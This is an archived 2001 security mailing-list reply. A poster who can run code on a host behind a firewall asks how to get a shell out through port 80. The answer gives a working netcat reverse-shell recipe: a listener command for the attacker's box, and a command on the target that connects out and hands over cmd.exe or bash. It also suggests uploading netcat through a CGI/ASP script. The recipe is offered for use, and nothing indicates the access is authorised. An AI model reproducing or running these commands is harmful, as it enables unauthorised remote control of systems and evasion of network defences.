Re: Server initiated remote shell
From: Bill Pennington (billp@boarder.org)Date: 09/21/01
- Previous message: Steve: "RE: Server initiated remote shell"
- In reply to: Ilici Ramirez: "Server initiated remote shell"
- Next in thread: Greg Ardpic: "Re: Server initiated remote shell"
- Next in thread: auto241065@hushmail.com: "Re: Server initiated remote shell"
- Reply: Greg Ardpic: "Re: Server initiated remote shell"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Message-ID: <3BABB64C.5571983@boarder.org> Date: Fri, 21 Sep 2001 14:51:08 -0700 From: Bill Pennington <billp@boarder.org> To: Ilici Ramirez <ilici_ramirez@yahoo.com> Subject: Re: Server initiated remote shell
You want netcat, you can find in on packetstorm.
What you will need to do first is build an CGI/ASP script to upload your
code, assuming you can't just tftp it from the internal system.
Then on your box execute:
nc -l -p 80
On the remote server execute
nc <yourbox> 80 -e c:\winnt\system32\cmd.exe or /usr/bin/bash or
whatever command interpeter is handy. You will then see a command prompt
appear on your local box.
Sounds like the hard part will be getting netcat on the box. Good luck!
Ilici Ramirez wrote:
>
> Hi,
>
> Lets suppose that I can execute a program on an inside
> host on a network protected by a firewall. There is no
> way in. But there is a way out to www browsing on port
> 80.
>
> So the client could connect to any Internet address on
> port 80. What program should it execute to provide me
> with a shell? Of course I'm in Internet with a
> listener. What listener?
>
> The firewall is a real statefull firewall so no TCP
> ACK or ICMP encapsulations.
>
> Have a nice weekend too.
>
> Ilici R
>
> __________________________________________________
> Terrorist Attacks on U.S. - How can you help?
> Donate cash, emergency relief information
> http://dailynews.yahoo.com/fc/US/Emergency_Information/
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
> Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security vulnerabilities please see:
> https://alerts.securityfocus.com/
--Bill Pennington - CISSP
---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
- Previous message: Steve: "RE: Server initiated remote shell"
- In reply to: Ilici Ramirez: "Server initiated remote shell"
- Next in thread: Greg Ardpic: "Re: Server initiated remote shell"
- Next in thread: auto241065@hushmail.com: "Re: Server initiated remote shell"
- Reply: Greg Ardpic: "Re: Server initiated remote shell"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
